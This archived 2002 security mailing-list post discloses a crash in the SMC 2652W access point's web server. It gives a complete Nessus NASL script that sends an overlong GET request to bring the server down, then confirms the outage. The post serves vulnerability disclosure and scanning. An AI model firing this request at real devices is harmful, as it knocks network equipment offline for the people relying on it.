|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: foo Dikator (f00dikator_at_yahoo.com)
Date: Tue Oct 08 2002 - 19:06:35 CDT
dies with
./closed_source_web_server_fuzz ip 80 GET / index1 .htm 0 57
which translates to this (for nessus/nasl users out there):
# this crashes the SMC 2652W WLAN Access Point webserver
# foudn with SPIKE 2.7
port = 80;
req = string("GET /", crap(240), ".html?OpenElement&FieldElemFormat=gif HTTP/1.1\r\n");
req = string(req, "Referer: http://localhost/bob\r\n");
req = string(req, "Content-Type: application/x-www-form-urlencoded\r\n");
req = string(req, "Connection: Keep-Alive\r\n");
req = string(req, "Cookie: VARIABLE=DAVEAITEL; path=/\r\n");
req = string(req, "User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)\r\n");
req = string(req, "Variable: result\r\n");
req = string(req, "Host: localhost\r\nContent-length: 13\r\n");
req = string(req, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png\r\n");
req = string(req, "Accept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n");
soc = open_sock_tcp(port);
if (soc) {
send(socket:soc, data:req);
close(soc);
}
soc = open_sock_tcp(port);
if (!soc) {security_hole(port); exit(0); }
req = string("GET / HTTP/1.0\r\n\r\n");
send(socket:soc, data:req);
bling = recv(socket:soc, length:1024, timeout:5);
if (!bling) security_hole(port);
---------------------------------
Do you Yahoo!?
Faith Hill - Exclusive Performances, Videos, & more
faith.yahoo.com
_______________________________________________
Spike mailing list
Spike
immunitysec.com
http://www.immunitysec.com/mailman/listinfo/spike
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]